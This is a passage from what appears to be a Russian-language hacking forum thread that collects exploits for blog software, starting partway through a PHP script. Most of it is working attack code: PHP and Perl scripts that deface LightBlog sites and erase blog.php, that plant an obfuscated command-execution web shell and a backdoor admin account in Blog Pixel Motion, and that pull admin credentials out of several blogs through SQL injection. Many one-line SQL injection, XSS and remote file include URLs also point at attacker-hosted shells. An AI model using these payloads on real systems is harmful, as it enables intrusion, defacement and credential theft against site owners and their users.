   $ock=fsockopen($parts[0],$parts[1]);
   if (!$ock) {
     echo 'No response from proxy...';die;
       }
 }
 fputs($ock,$packet);
 if ($proxy=='') {
   $html='';
   while (!feof($ock)) {
     $html.=fgets($ock);
   }
 }
 else {
   $html='';
   while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
     $html.=fread($ock,1);
   }
 }
 fclose($ock);
}

$host=$argv[1];
$path=$argv[2];
$attack_type=$argv[3];
$port=80;
$proxy="";


if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}

switch($attack_type)
{
case 1//Insert New Post
$title=$argv[4];
$message="";
for ($i=5$i<=$argc-1$i++){
$message.=" ".$argv[$i];
}
$title=urlencode($title);
$message=urlencode($message);
echo "Attack No 1 - Sending New Post..\r\n";
$data="t=$title";
$data.="&c=$message";
$data.="&Submit=Post";
$packet="POST ".$p."LightBlog/blog_script.php HTTP/1.0\r\n";
$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, * /*\r\n";
$packet.="Referer: http://".$host.$path."/blog.php\r\n";
$packet.="Accept-Language: it\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Accept-Encoding: gzip, deflate\r\n";
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Close\r\n";
$packet.="Cache-Control: no-cache\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
echo "Ok, Post Sent";
break;

case 2// Deface With XSS
$dfc_url=$argv[4];
$deface_url=urlencode("<script>window.location=('$dfc_url')</script>");
echo "Attack No 2 - Sending New Post With XSS..\r\n";
$data="t=$deface_url";
$data.="&c=msg";
$data.="&Submit=Post";
$packet="POST ".$p."LightBlog/blog_script.php HTTP/1.0\r\n";
$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, * /*\r\n";
$packet.="Referer: http://".$host.$path."/blog.php\r\n";
$packet.="Accept-Language: it\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Accept-Encoding: gzip, deflate\r\n";
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Close\r\n";
$packet.="Cache-Control: no-cache\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
echo "Ok, Post Sent";
break;

break;
case 3// Defacing the original blog.php file
$nickname=$argv[4];
$packet ="GET ".$p."LightBlog/blog_comments.php?comment=Comment&title=title HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
$temp=explode("name=\"rand\" id=\"rand\" value=\"",$html);
$temp2=explode("\"></input>",$temp[1]);
$random_code $temp2[0];
$temp=explode("name=\"rand\" id=\"rand\" value=\"$random_code\"></input>",$html);
$temp2=explode(" ",$temp[1]);
$small_code $temp2[0];


$data="t=../../blog.php%00";
$data.="&c=ciao";
$data.="&Submit=Post";
$packet="POST ".$p."/LightBlog/blog_script.php HTTP/1.0\r\n";
$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, * /*\r\n";
$packet.="Referer: http://".$host.$path."/blog.php\r\n";
$packet.="Accept-Language: it\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Accept-Encoding: gzip, deflate\r\n";
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Close\r\n";
$packet.="Cache-Control: no-cache\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
echo "blog.php File erased\r\n";

// This part will work only if mq=off elsewhere the exploit will only delete blog.php
$deface_text=urlencode("|:. $nickname got you! .:");
$signature=urlencode(" BlackHawk And Piggy-Marty Rulez info --> <hawkgotyou@gmail.com>");
$packet ="GET ".$p."LightBlog/add_comment_script.php?name=$deface_text&comment=$signature&rand=$random_code&val=$small_code&Submit=Submit&title=../../blog.php/%00 HTTP/1.0\r\n";
$packet.="Referer: http://".$host.$path."blog.php\r\n";
$packet.="Accept-Language: it\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Accept-Encoding: gzip, deflate\r\n";
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
echo "Ok, Blog Defaced";
break;
}
?>

# milw0rm.com [2006-10-27]
Def-Blog <= v1.0.1 SQL Injection

Цитата:
USER : comadd.php?article=-1%20union%20select%20null,pseudo%20from%20def_user
PASS : comadd.php?article=-1%20union%20select%20null,mdp%20from%20def_user
OpenDock Easy Blog <=1.4 File Include

Цитата:
http://target.com/[OpenDockEasyBlog_Path]/sw/lib_up_file/file.php?doc_directory=http://attacker.com/inject.txt?
http://target.com/[OpenDockEasyBlog_Path]/sw/lib_up_file/find_file.php?doc_directory=http://attacker.com/inject.txt?
http://target.com/[OpenDockEasyBlog_Path]/sw/lib_comment/comment.php?doc_directory=http://attacker.com/inject.txt?
http://target.com/[OpenDockEasyBlog_Path]/sw/lib_find/find.php?doc_directory=http://attacker.com/inject.txt?
A-Blog v2.0 Remote File Include

Цитата:
http://localhost/A-Blog/sources/myaccount.php?open_box=http://shell.txt?
http://localhost/A-Blog/sources/myaccount.php?middle_box=http://shell.txt?
http://localhost/A-Blog/sources/myaccount.php?close_box=http://shell.txt?
http://localhost/A-Blog/navigation/search.php?navigation_end=http://shell.txt?
http://localhost/A-Blog/navigation/donation.php?navigation_start=http://shell.txt?
http://localhost/A-Blog/navigation/donation.php?navigation_middle=http://shell.txt?
http://localhost/A-Blog/navigation/donation.php?navigation_end=http://shell.txt?
http://localhost/A-Blog/navigation/latestnews.php?navigation_start=http://shell.txt?
http://localhost/A-Blog/navigation/latestnews.php?navigation_middle=http://shell.txt?
http://localhost/A-Blog/navigation/links.php?navigation_start=http://shell.txt?
http://localhost/A-Blog/navigation/links.php?navigation_middle=http://shell.txt?
Blog Pixel Motion 2.1.1 PHP Code Execution / Create Admin

PHP код:
#!/usr/bin/perl
#
# Affected.scr..: Blog Pixel Motion V2.1.1
# Poc.ID........: 12060927
# Type..........: PHP Code Execution (stripslashes), SQL Injection (urldecode)
# Risk.level....: High
# Vendor.Status.: Unpatched
# Src.download..: www.pixelmotion.org/zip/blog2.1.zip
# Poc.link......: acid-root.new.fr/poc/12060927.txt
# Credits.......: DarkFig
#
# print "This exploit is for educational purpose only" x 999; exit;
#
use LWP::UserAgent;
use HTTP::Request::Common;
use HTTP::Response;
use Getopt::Long;
use strict;

print STDOUT "\n+"'-' x 60"+\n";
print STDOUT "| Blog Pixel Motion V2.1.1 PHP Code Execution / Create Admin |\n";
print STDOUT '+''-' x 60"+\n";

my($host,$path,$proxh,$proxu,$proxp,$choice,$cmd,$res,$re);
my $opt GetOptions(
   'host=s'   =>  \$host,
   'path=s'   =>  \$path,
   'proxh=s'  =>  \$proxh,
   'proxu=s'  =>  \$proxu,
   'proxp=s'  =>  \$proxp,
   'choice=s' =>  \$choice);

if(!$host) {
    print STDOUT "|      Usage: ./zz.pl --host=[www] --path=[/] --choice=[0]   |\n";
    print STDOUT "|   [Choice.]  1=PHP_Code_Execution       2=Create_Admin     |\n";
    print STDOUT "|   [Options] --proxh=[ip] --proxu=[user] --proxp=[pwd]      |\n";
    print STDOUT '+''-' x 60"+\a\n";
    exit(1);
}

if($host  !~ /http/) {$host 'http://'.$host;}
if($proxh !~ /http/ && $proxh != '') {$proxh 'http://'.$proxh.'/';}
if(!$path) {$path '/';}
if(!$choice) {$choice 2;}

my $ua LWP::UserAgent->new();
   $ua->agent('0xzilla');
   $ua->timeout(30);
   $ua->proxy(['http'] => $proxh) if $proxh;
   $re->proxy_authorization_basic($proxu$proxp) if $proxp;

if($choice == 1) {

   $re POST $host.$path.'config.php', [
   'nom_blog'  => '";
    $shcode  = chr(0x69).chr(0x66).chr(0x28).chr(0x69).chr(0x73).chr(0x73).chr(0x65);
    $shcode .= chr(0x74).chr(0x28).chr(0x24).chr(0x5F).chr(0x47).chr(0x45).chr(0x54);
    $shcode .= chr(0x5B).chr(0x27).chr(0x63).chr(0x6D).chr(0x64).chr(0x27).chr(0x5D);
    $shcode .= chr(0x29).chr(0x29).chr(0x7B).chr(0x73).chr(0x79).chr(0x73).chr(0x74);
    $shcode .= chr(0x65).chr(0x6D).chr(0x28).chr(0x73).chr(0x74).chr(0x72).chr(0x69);
    $shcode .= chr(0x70).chr(0x73).chr(0x6C).chr(0x61).chr(0x73).chr(0x68).chr(0x65);
    $shcode .= chr(0x73).chr(0x28).chr(0x24).chr(0x5F).chr(0x47).chr(0x45).chr(0x54);
    $shcode .= chr(0x5B).chr(0x27).chr(0x63).chr(0x6D).chr(0x64).chr(0x27).chr(0x5D);
    $shcode .= chr(0x29).chr(0x29).chr(0x3B).chr(0x7D).chr(0x0D).chr(0x0A);
    eval($shcode); die(); //'];
    $ua->request($re);

    while(<STDIN>){
    chomp($cmd $_);
    if($cmd eq 'exit') { exit(0); }
    $re GET $host.$path.'include/variables.php?cmd='.$cmd;
    $res $ua->request($re);
    print STDOUT "\n\n".$res->content."\n\$sh: ";
    }


} else {

  $re GET $host.$path.'insere_base.php?login=woot&pass=t00w';
  $ua->request($re);
  print STDOUT "[+] Admin login.: woot\n";
  print STDOUT "[+] Admin passwd: t00w\n";
  print STDOUT '+''-' x 60"+\n";

}

# milw0rm.com [2006-09-27] 
A-Blog V2 Remote File Include

Код:
http://www.site.com/ablog_dir/navigation/menu.php?navigation_start=http://marcusbestlamer.gay/shell.php?
Spidey Blog Script <= 1.5 SQL Injection

PHP код:
#!usr/bin/perl

#Author : gega
#Google : "Spidey Blog Script (c) v1.5"
#SpideyBlog 1.5 Sql Injection Exploit
#Author Mail : gega.tr[at]gmail[dot]com
#Powered by e-hack.org
#Vulnerability by Asianeagle.
#Vulnerability Link : http://milw0rm.com/exploits/2186

use LWP::Simple;

print "\n==============================\n";
print "==      Spidey Blog v1.5    ==\n";
print "==   Sql Injection Exploit  ==\n";
print "==        Author : gega     ==\n";
print "==============================\n\n";

if(!$ARGV[0] or !$ARGV[0]=~/http/ or !$ARGV[1] or ($ARGV[1ne 'password' and $ARGV[1ne 'nick'))
{
    print "Usage : perl $0 [path] [function]\n";
    print "path ==> http://www.example.com/blog/\n";
    print "function ==> nick OR password\n";
    print "Example : perl $0 http://site.org/blog/ nick\n";
    exit(0);
}
else
{
    if($ARGV[1eq 'nick'){
        $url=q[proje_goster.asp?pid=-1%20union%20select%200,1,2,3,4,kullanici_adi,6%20from%20uyeler%20where%20id%20like%201];
        $page=get($ARGV[0].$url) || die "[-] Unable to retrieve: $!";
        print "[+] Connected to: $ARGV[0]\n";
        $page=~m/<td width="100%" valign="top" height="19" colspan="3"><span class="normal_yazi">(.*?)<\/span><\/td>/ && print "[+] Username of administrator is: $1\n";
        print "[-] Unable to retrieve username\n" if(!$1); }
    else {
        $code=q[proje_goster.asp?pid=-1%20union%20select%200,1,2,3,4,sifre,6%20from%20uyeler%20where%20id%20like%201];
        $page=get($ARGV[0].$code) || die "[-]Unable to retrieve: $!";
        print "[+] Connected to: $ARGV[0]\n";
        $page=~m/<td width="100%" valign="top" height="19" colspan="3"><span class="normal_yazi">(.*?)<\/span><\/td>/ && print "[+] MD5 hash of password is: $1\n";
        print "[-] Unable to retrieve password\n" if(!$1);
    }
}
 
#To Be Or Not To Be!

# milw0rm.com [2006-09-24] 

Ded MustD!e 09.06.2008 22:12
xweblog <= 2.1 SQL Injection

Код:
http://www.victim.com/[xweblog path]/kategori.asp?kategori=-1%20union%20select%200,ad,2,3,4,5,6,7,8,9,sifre,11,12%20from%20uyeler
TualBLOG 1.0 SQL Injection

Код:
http://site.com/[path]/icerik.asp?icerikno=-1%20union+select+mail,sifre,uyeadi+from+tbl_uye+where+uyeno=1
SimpleBlog <= 2.3 SQL Injection

Код:
http://[target]/[path]/default.asp?view=plink&id=-1%20UNION%20SELECT%20ID,uFULLNAME,uUSERNAME,uPASSWORD,uEMAIL,uDATECREATED,null,null,null%20FROM%20T_USERS%20WHERE%20id>1
icblogger v2 SQL Injection

Код:
http://www.target.com/path/devam.asp?YID=-1 UNION SELECT null,null,null,null,null,editor_adi,null,editor_sifre,editor_mail,null FROM editor WHERE editor_id = 1
Админка:
Цитата:
http://www.target.com/path/admin/default.asp
SimpleBlog <= 2.0 SQL Injection

PHP код:
#!/usr/bin/perl
#Method found by Chironex Fleckeri 
#Exploit By ASIANEAGLE
#Contact:admin@asianeagle.org
#Original advisory: http://www.milw0rm.com/exploits/2228
#Usage: exploitname.pl <host> <path> <id>
use IO::Socket;
if(@ARGV != 3) { usage(); }
else { exploit(); }
sub header()
{
  print " *****SimpleBlog 2.0 SQL Injection Exploit***** \r\n";
  print "      *****www.asianeagle.org***** \r\n";
  }
sub usage() 
{
  header();
  print " *Usage: $0 <host> <path> <id>\r\n";
  print " *<host> = Victim's host ex: www.site.com\r\n";
  print " *<path> = SimpleBlog Path ex: /SimpleBlog/\r\n";
  print " *<id>   = Admin ID ex: 1\r\n";
  exit();
}
sub exploit () 
{
  $simserver $ARGV[0];
  $simserver =~ s/(http:\/\/)//eg;
  $simhost   "http://".$simserver;
  $simdir    $ARGV[1];
  $simport   "80";
  $simtar    "comments.asp?id=";
  $simsql    "-1%20UNION%20SELECT%20ID,uFULLNAME,uUSERNAME,uPASSWORD,uEMAIL,uDATECREATED,null,null%20FROM%20T_USERS%20WHERE%20id%20like%20".$ARGV[2];
  $simreq    $simhost.$simdir.$simtar.$simsql;
 
  header();
  print "- Trying to connect: $simserver\r\n";
  $sim IO::Socket::INET->new(Proto => "tcp"PeerAddr => "$simserver"PeerPort => "$simport") || die "- Connection failed...\n";
  print $sim "GET $simreq HTTP/1.1\n";
  print $sim "Accept: */*\n";
  print $sim "Referer: $simhost\n";
  print $sim "Accept-Language: tr\n";
  print $sim "User-Agent: Mozzilla\n";
  print $sim "Cache-Control: no-cache\n";
  print $sim "Host: $simserver\n";
  print $sim "Connection: close\n\n";
  print "Connected...\r\n";
  while ($answer = <$sim>) {
    if ($answer =~ /class=\"c_content\">(.*?)<\/td><\/tr>/) { 
      if ($1 == $ARGV[2]) {
        print "Seems Vulnerable :)\r\n";
      }
      else { die "Exploit failed\n"; }     
    }
    if ($answer =~ /class=\"c_content\"><b>(.*)<\/b>/) {
      print "Username: $1\r\n";
    }
    if ($answer =~ /href=\"mailto:(.*?)\">(.*?)<\/a>/) {
      print "Password: $1\r\n";
    }  
  }
  
 
 
}

# milw0rm.com [2006-08-20] 
LBlog <= 1.05 SQL Injection

Код:
http://www.target.com/path/comments.asp?id=-1 UNION SELECT 0,username,password,3,4+FROM+LOGIN+WHERE+ID=1
Админка:
Цитата:
http://www.target.com/path/admin
SAPID Blog <= beta 2 Remote File Include

Цитата:
http://www.site.com/[sapidblog_path]/usr/extensions/get_blog_infochannel.inc.php?root_path=[evil_scripts]

http://www.site.com/[sapidblog_path]/usr/extensions/get_blog_meta_info.inc.php?root_path=[evil_scripts]

http://www.site.com/[sapidblog_path]/usr/extensions/get_infochannel.inc.php?root_path=[evil_scripts]

http://www.site.com/[sapidblog_path]/usr/extensions/get_tree.inc.php?GLOBALS[root_path]=[evil_scripts]
myBloggie <= 2.1.4 Multiple SQL Injections

PHP код:
#!/usr/bin/php -q -d short_open_tag=on
<?
echo "MyBloggie <= 2.1.4 trackback.php multiple SQL injections vulnerability /\n";
echo "administrative credentials disclosure exploit\n";
echo "by rgod rgod@autistici.org\n";
echo "site: http://retrogod.altervista.org\n\n";

/*
works regardless of php.ini settings
against MySQL >= 4.1 (allowing subs)
*/

if ($argc<3) {
echo "Usage: php ".$argv[0]." host path OPTIONS\n";
echo "host:      target server (ip/hostname)\n";
echo "path:      path to MyBloggie\n";
echo "Options:\n";
echo "   -i           specify an existent post id (default: 1)\n";
echo "   -T[prefix]   specify a table prefix different from default (mb_)\n";
echo "   -p[port]:    specify a port other than 80\n";
echo "   -P[ip:port]: specify a proxy\n";
echo "   -d:          disclose table prefix (reccomended)\n";
echo "Example:\r\n";
echo "php ".$argv[0]." localhost /MyBloggie/ -d -i7\r\n";
echo "php ".$argv[0]." localhost /MyBloggie/ -Tm_\r\n";
die;
}

/* software site: http://mybloggie.mywebland.com/

  vulnerable code in trackback.php:

...
if(!empty($_REQUEST['title'])) {
$title=urldecode(substr($_REQUEST['title'],0,$tb_title_len));
}
else { $tback->trackback_reply(1, "<p>Sorry, Trackback failed.. Reason : No title</p>"); }

if(!empty($_REQUEST['url'])) {
$url=urldecode($_REQUEST['url']);

if (validate_url($url)==false) { $tback->trackback_reply(1, "<p>Sorry, Trackback failed.. Reason : URL not valid</p>"); }
}
else { $tback->trackback_reply(1, "<p>Sorry, Trackback failed.. Reason : No URL</p>"); }

if(!empty($_REQUEST['excerpt']))
 {
  $excerpt=urldecode(substr($_REQUEST['excerpt'],0,$tb_excerpt_len));
 } else {
    $tback->trackback_reply(1, "<p>Sorry, Trackback failed.. Reason : No Excerpt</p>");
 }

// The blog name
if(!empty($_REQUEST['blog_name']))
 {
    $blog_name=urldecode(substr($_REQUEST['blog_name'],0,$tb_blogname_len));
 } else
 {
    $blog_name="No Blog Name";
 }

$timestamp = mktime(gmtdate('H', time(), $timezone ),gmtdate('i', time(), $timezone ),
             gmtdate('s', time(), $timezone ), gmtdate('n', time(), $timezone ),
             gmtdate('d', time(), $timezone ), gmtdate('Y', time(), $timezone ));

$sql = "INSERT INTO ".COMMENT_TBL." SET post_id='$tb_id', comment_subject='$title', comments='$excerpt', com_tstamp='$timestamp' ,
              poster = '$blog_name', home='$url', comment_type='trackback'";

$result = $db->sql_query($sql) or die("Cannot query the database.<br>" . mysql_error());
...

you have sql injection in 'title', 'url', 'excerpt' and 'blog_name' argument
with MySQL >= 4.1 that allows SELECT subqueries for INSERT...

so you can insert admin username & password hash inside comments and you will see them at screen
also arguments are passed to urldecode(), so you can bypass magic_quotes_gpc
with '%2527' sequence for the single quote char
adn you can disclose table prefix going to:

http://192.168.1.3/mybloggie/index.php?mode=viewdate

you will have an error that disloses a query fragment

-

ex., injecting code in 'title' argument, query becomes:

INSERT INTO mb_comment SET post_id='1', comment_subject='hi',comments=(SELECT CONCAT('<!--',password,'-->')FROM mb_user)/*', comments='whatever', com_tstamp='1154799697' ,
poster = 'whatever', home='http://www.suntzu.org', comment_type='trackback'
                                          */

error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);

function quick_dump($string)
{
  $result='';$exa='';$cont=0;
  for ($i=0$i<=strlen($string)-1$i++)
  {
   if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
   {$result.="  .";}
   else
   {$result.="  ".$string[$i];}
   if (strlen(dechex(ord($string[$i])))==2)
   {$exa.=" ".dechex(ord($string[$i]));}
   else
   {$exa.=" 0".dechex(ord($string[$i]));}
   $cont++;if ($cont==15) {$cont=0$result.="\r\n"$exa.="\r\n";}
  }
 return $exa."\r\n".$result;
}
$proxy_regex '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacketii($packet)
{
  global $proxy$host$port$html$proxy_regex;
  if ($proxy=='') {
    $ock=fsockopen(gethostbyname($host),$port);
    if (!$ock) {
      echo 'No response from '.$host.':'.$port; die;
    }
  }
  else {
   $c preg_match($proxy_regex,$proxy);
    if (!$c) {
      echo 'Not a valid proxy...';die;
    }
    $parts=explode(':',$proxy);
    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
    $ock=fsockopen($parts[0],$parts[1]);
    if (!$ock) {
      echo 'No response from proxy...';die;
   }
  }
  fputs($ock,$packet);
  if ($proxy=='') {
    $html='';
    while (!feof($ock)) {
      $html.=fgets($ock);
    }
  }
  else {
    $html='';
    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
      $html.=fread($ock,1);
    }
  }
  fclose($ock);
  #debug
  #echo "\r\n".$html;
}

function is_hash($hash)
{
 if (ereg("^[a-f0-9]{32}",trim($hash))) {return true;}
 else {return false;}
}

$host=$argv[1];
$path=$argv[2];
$port=80;
$prefix="mb_";
$post_id="1";//admin
$proxy="";
$dt=0;

for ($i=3$i<$argc$i++){
$temp=$argv[$i][0].$argv[$i][1];
if ($temp=="-p")
{
  $port=str_replace("-p","",$argv[$i]);
}
if ($temp=="-P")
{
  $proxy=str_replace("-P","",$argv[$i]);
}
if ($temp=="-T")
{
  $prefix=str_replace("-T","",$argv[$i]);
}
if ($temp=="-i")
{
  $post_id=(int) str_replace("-i","",$argv[$i]);
  echo "post id -> ".$post_id."\n";
}
if ($temp=="-d")
{
  $dt=1;
}
}
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}

if ($dt)
{
$packet ="GET ".$p."index.php?mode=viewdate HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
if (strstr($html,"You have an error in your SQL syntax"))
{
  $temp=explode("UNIXTIME(",$html);
  $temp2=explode("posts.timest",$temp[1]);
  $prefix=$temp2[0];
  echo "table prefix -> ".$prefix."\n";
}
}

$sql="%2527,comments=(SELECT CONCAT(%2527<!--%2527,password,%2527-->%2527)FROM ".$prefix."user)/*";
//some problems with argument length, maybe with prefix > 3 chars you will have some error, cut the '<!--' but hash will be clearly visible in comments
$data="title=hi".$sql;
$data.="&url=http%3a%2f%2fwww%2esuntzu%2eorg";
$data.="&excerpt=whatever";
$data.="&blog_name=whatever";
$packet ="POST ".$p."trackback.php/$post_id HTTP/1.0\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;
sendpacketii($packet);

$sql="%2527,comments=(SELECT CONCAT(%2527<!--%2527,user,%2527-->%2527)FROM ".$prefix."user)/*";
$data="title=hi".$sql;
$data.="&url=http%3a%2f%2fwww%2esuntzu%2eorg";
$data.="&excerpt=whatever";
$data.="&blog_name=whatever";
$packet ="POST ".$p."trackback.php/$post_id HTTP/1.0\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
sleep(1);

$packet ="GET ".$p."index.php?mode=viewid&post_id=$post_id HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
//echo $html;
$temp=explode('"message"><!--',$html);
for ($i=1$i<count($temp); $i++)
{
$temp2=explode("-->",$temp[$i]);
if (is_hash($temp2[0]))
{
  $hash=$temp2[0];
  $temp2=explode("-->",$temp[$i+1]);
  $admin=$temp2[0];
  echo "----------------------------------------------------------------\n";
  echo "admin          -> ".$admin."\n";
  echo "password (md5) -> ".$hash."\n";
  echo "----------------------------------------------------------------\n";
  die();
}
}
//if you are here...
echo "exploit failed...";
?>

# milw0rm.com [2006-08-07]
LoudBlog <= 0.5 SQL Injection / Admin Credentials Disclosure

PHP код:
#!/usr/bin/php -q -d short_open_tag=on
<?
echo "LoudBlog <= 0.5 'id' SQL injection / admin credentials disclosure\r\n";
echo "by rgod rgod@autistici.org\r\n";
echo "site: http://retrogod.altervista.org\r\n";
echo "a dork: \"Powered by LoudBlog\"\r\n\r\n";
/*
works regardless of magic_quotes_gpc settings
*/

if ($argc<3) {
echo "Usage: php ".$argv[0]." host path OPTIONS\r\n";
echo "host:      target server (ip/hostname)\r\n";
echo "path:      path to LoudBlog\r\n";
echo "user/pass: you need an account\r\n";
echo "Options:\r\n";
echo "   -T[prefix]   specify a table prefix different from 'lb_'\r\n";
echo "   -p[port]:    specify a port other than 80\r\n";
echo "   -P[ip:port]: specify a proxy\r\n";
echo "Example:\r\n";
echo "php ".$argv[0]." localhost /loudblog/  \r\n";
die;
}
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);

function quick_dump($string)
{
  $result='';$exa='';$cont=0;
  for ($i=0$i<=strlen($string)-1$i++)
  {
   if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
   {$result.="  .";}
   else
   {$result.="  ".$string[$i];}
   if (strlen(dechex(ord($string[$i])))==2)
   {$exa.=" ".dechex(ord($string[$i]));}
   else
   {$exa.=" 0".dechex(ord($string[$i]));}
   $cont++;if ($cont==15) {$cont=0$result.="\r\n"$exa.="\r\n";}
  }
 return $exa."\r\n".$result;
}
$proxy_regex '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacketii($packet)
{
  global $proxy$host$port$html$proxy_regex;
  if ($proxy=='') {
    $ock=fsockopen(gethostbyname($host),$port);
    if (!$ock) {
      echo 'No response from '.$host.':'.$port; die;
    }
  }
  else {
    $c preg_match($proxy_regex,$proxy);
    if (!$c) {
      echo 'Not a valid proxy...';die;
    }
    $parts=explode(':',$proxy);
    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
    $ock=fsockopen($parts[0],$parts[1]);
    if (!$ock) {
      echo 'No response from proxy...';die;
    }
  }
  fputs($ock,$packet);
  if ($proxy=='') {
    $html='';
    while (!feof($ock)) {
      $html.=fgets($ock);
    }
  }
  else {
    $html='';
    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
      $html.=fread($ock,1);
    }
  }
  fclose($ock);
  #debug
  #echo "\r\n".$html;
}

function is_hash($hash)
{
 if (ereg("^[a-f0-9]{32}",trim($hash))) {return true;}
 else {return false;}
}

$host=$argv[1];
$path=$argv[2];
$port=80;
$prefix="lb_";
$proxy="";
for ($i=3$i<=$argc-1$i++){
$temp=$argv[$i][0].$argv[$i][1];
if ($temp=="-p")
{
  $port=str_replace("-p","",$argv[$i]);
}
if ($temp=="-P")
{
  $proxy=str_replace("-P","",$argv[$i]);
}
if ($temp=="-T")
{
  $prefix=str_replace("-T","",$argv[$i]);
}
}
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}

$zeros=array(",0,0,0,0"//<- this the one I tested, may change in other versions
         ",0,0,0",
         ",0,0",
         ",0",
         ",0,0,0,0,0",
         ",0,0,0,0,0,0",
         ",0,0,0,0,0,0,0");

for ($i=0$i<count($zeros); $i++)
{
$sql="'UNION/**/SELECT/**/0,0,CONCAT('*_u_*',nickname,'*_u_*'),'2005-03-29 16:32:42',0,0,0,0,0,0,CONCAT('*_p_*',password,'*_p_*'),0,0,0,0,0,0,0".$zeros[$i]."/**/FROM/**/".$prefix."authors/**/WHERE/**/id=1/*";
//debug
//echo "sql -> ".$sql."\r\n";
$sql=urlencode($sql);
$packet ="GET ".$p."index.php?id=$sql HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
$temp=explode("*_p_*",$html);
$hash=$temp[1];
if (is_hash($hash))
{
echo "-------------------------------------------------------\r\n";
echo "password (md5) -> ".$hash."\r\n";
$temp=explode("*_u_*",$html);
echo "admin          -> ".$temp[1]."\r\n";
echo "-------------------------------------------------------\r\n";
die;
}
}
//if you are here...
echo "exploit failed...";
?>

# milw0rm.com [2006-07-21]

Ctacok 08.11.2009 06:03
BLOG:CMS 4.2.1
 
BLOG:CMS v4.2.1
Раскрытие путей
Цитата:
/?query[]=1234&blogid=1
Уязвимой код:
PHP код:
$this->formdata = array(
            'id' => $blog?$blog->getID():$CONF['DefaultBlog'],
            'query' => htmlspecialchars(getVar('query')),
        ); 
Цитата:
/photo/index.php?gallery[]=Corvette
Уязвимый код:
PHP код:
$_REQUEST array_map("htmlentities"$_REQUEST); 
Активная XSS
Уязвимость находиться в комментариях к блогу (Его записям).
Цитата:
[a href=javascript:alert();]Free Porno![/a]


Время: 10:17